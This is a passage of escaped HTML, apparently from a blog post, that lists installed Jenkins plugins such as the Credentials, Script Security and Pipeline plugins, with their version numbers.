\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.17\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eapache-httpcomponents-client-4-api Apache HttpComponents Client 4.x API Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.5.5-3.0\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Emailer\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Mailer Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.23\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ecommand-launcher\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Command Agent Launcher Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.3\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eworkflow-api\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Pipeline: API\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.33\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eworkflow-job\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Pipeline: Job\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.31\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Essh-credentials\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; SSH Credentials Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.14\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eauthentication-tokens\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Authentication Tokens API Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.3\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eworkflow-cps-global-lib\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline: Shared Groovy Libraries\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.13\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ejackson2-api\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Jackson 2 API Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.9.8\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Epipeline-stage-tags-metadata\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Pipeline: Stage Tags Metadata\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.3.4.1\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Epipeline-milestone-step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline: Milestone Step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.3.1\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ecredentials\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Credentials Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.1.18\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Elockable-resources\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Lockable Resources plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.4\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ejquery-detached\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; JavaScript GUI Lib: jQuery bundles (jQuery and jQuery UI) plugin 1.2.1\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eworkflow-scm-step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline: SCM Step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.7\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ematrix-auth\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Matrix Authorization Strategy Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.3\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ematrix-project\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Matrix Project Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.13\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Epipeline-stage-step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline: Stage Step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.3\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Epipeline-build-step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline: Build Step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.7\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Epipeline-input-step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline: Input Step\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.9\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ebouncycastle-api\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;bouncycastle API Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.17\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ehandlebars\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;JavaScript GUI Lib: Handlebars bundle plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.1.1\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Emomentjs\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;JavaScript GUI Lib: Moment.js bundle plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.1.1\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eplain-credentials\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Plain Credentials Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.5\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Edocker-commons\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Docker Commons Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.13\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Egit-client\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Git client plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.7.6\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Epipeline-rest-api\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline: REST API Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.10\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eworkflow-basic-steps\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Pipeline: Basic Steps\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.14\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Ecredentials-binding\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Credentials Binding Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.17 (1.18)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Epipeline-stage-view\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline: Stage View Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.10\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eworkflow-multibranch\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;Pipeline: Multibranch\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 2.20\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Escript-security\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Script Security Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.49 (1.53)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Egit-server\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;GIT server Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 1.7\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Eworkflow-step-api\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline: Step API\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;2.19\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003Epipeline-graph-analysis\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; Pipeline Graph Analysis Plugin\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;1.9\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"color: #444444; font-family: 